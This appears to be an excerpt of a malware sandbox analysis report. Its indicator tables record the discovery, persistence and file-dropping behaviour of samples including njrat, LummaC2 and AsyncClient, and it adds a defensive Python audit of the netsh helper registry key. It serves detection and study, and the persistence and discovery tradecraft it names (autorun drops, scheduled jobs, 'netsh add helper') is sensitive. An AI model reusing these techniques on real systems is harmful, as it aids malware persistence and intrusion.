| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File created | D:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File created | F:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Windows\rundll32.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 identical rows, all N/A, collapsed into one; the report records no indicator or process for this rule.)
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\NigerMauritius | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| File opened for modification | C:\Windows\ManualsDenver | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla3.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\e5a77f0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\YrQueensland | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5a77f0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\ActivatedPopulation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File opened for modification | C:\Windows\MiddleOrganize | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| File opened for modification | C:\Windows\BirthAttacked | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla2.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\ThatsConscious | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File opened for modification | C:\Windows\ItKinda | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe | N/A |
| File opened for modification | C:\Windows\EmotionalCnet | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| File created | C:\Windows\rundll32.exe | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| File opened for modification | C:\Windows\GtkRace | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7C36.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\ConvertedTechnologies | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5a77f4.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\rundll32.exe | C:\Windows\rundll32.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\347814563.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\347814563.exe | N/A |
| File opened for modification | C:\Windows\rundll32.exe | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(6 identical rows, all N/A, collapsed into one; the report records no indicator or process for this rule.)
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
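Every row in this table is a read (key opened, queried, values enumerated). netsh.exe performs exactly these reads on every start to find its helper DLLs, so on their own they corroborate the `netsh` wlan and firewall activity recorded elsewhere in the report rather than show a helper being registered. The write that would matter for T1546.007 is `netsh add helper <dll>`, which adds a value under `HKLM\SOFTWARE\Microsoft\NetSh`. The Python below is an added example, not part of the report: it audits a `reg query` dump of that key (the dump and the baseline are constructed; value names and DLLs are illustrative) and flags helpers registered with a path outside System32 or absent from a known-clean baseline of the same Windows build.

```python
"""Audit the netsh helper registration key for planted DLLs.

Added example, not part of the report. The `reg query` output and the
baseline below are constructed for illustration.
"""
import ntpath
import re

SYSTEM32 = r"c:\windows\system32"

# Constructed output of:  reg query HKLM\SOFTWARE\Microsoft\NetSh
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
    dhcpclient    REG_SZ    dhcpcmonitor.dll
    fwcfg    REG_SZ    fwcfg.dll
    wlancfg    REG_SZ    wlancfg.dll
    ifmon    REG_SZ    ifmon.dll
    updater    REG_SZ    C:\Users\Public\Libraries\updater.dll
    wshelper    REG_SZ    wshelper.dll
"""

# Constructed baseline: value name -> DLL, exported from a known-clean host
# of the same Windows build.
BASELINE = {
    "dhcpclient": "dhcpcmonitor.dll",
    "fwcfg": "fwcfg.dll",
    "wlancfg": "wlancfg.dll",
    "ifmon": "ifmon.dll",
}

# "<name>    REG_SZ    <data>" lines; the key header line does not match.
VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.+?)\s*$")


def parse_reg_query(text):
    """Return {value_name (lower-cased): data} from `reg query` output."""
    entries = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            entries[m.group(1).lower()] = m.group(3)
    return entries


def audit_netsh_helpers(text, baseline):
    """Classify each registered helper as (name, dll, finding, severity)."""
    findings = []
    for name, dll in parse_reg_query(text).items():
        directory = ntpath.dirname(dll).lower()
        if directory and not (directory == SYSTEM32 or directory.startswith(SYSTEM32 + "\\")):
            # Full path outside System32: what `netsh add helper C:\...\x.dll` leaves behind.
            findings.append((name, dll, "helper outside System32", "high"))
        elif name not in baseline:
            # Unknown bare filename: a feature added after the baseline was
            # taken, or a DLL planted where the loader's search order finds it.
            findings.append((name, dll, "helper not in baseline", "medium"))
        elif baseline[name].lower() != ntpath.basename(dll).lower():
            findings.append((name, dll, "helper DLL name changed", "high"))
        else:
            findings.append((name, dll, "matches baseline", "info"))
    return findings


def suspicious(text, baseline):
    """Only the findings worth a ticket."""
    return [f for f in audit_netsh_helpers(text, baseline) if f[3] in ("high", "medium")]


if __name__ == "__main__":
    for name, dll, finding, sev in audit_netsh_helpers(SAMPLE_REG_QUERY, BASELINE):
        print(f"[{sev:6}] {name:12} {dll:45} {finding}")
```

Pair this with a registry-write detection on the key itself (Sysmon Event ID 13 or Windows auditing on `HKLM\SOFTWARE\Microsoft\NetSh`), since the read-only rows above will fire on every legitimate `netsh` invocation.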
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\614016133.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
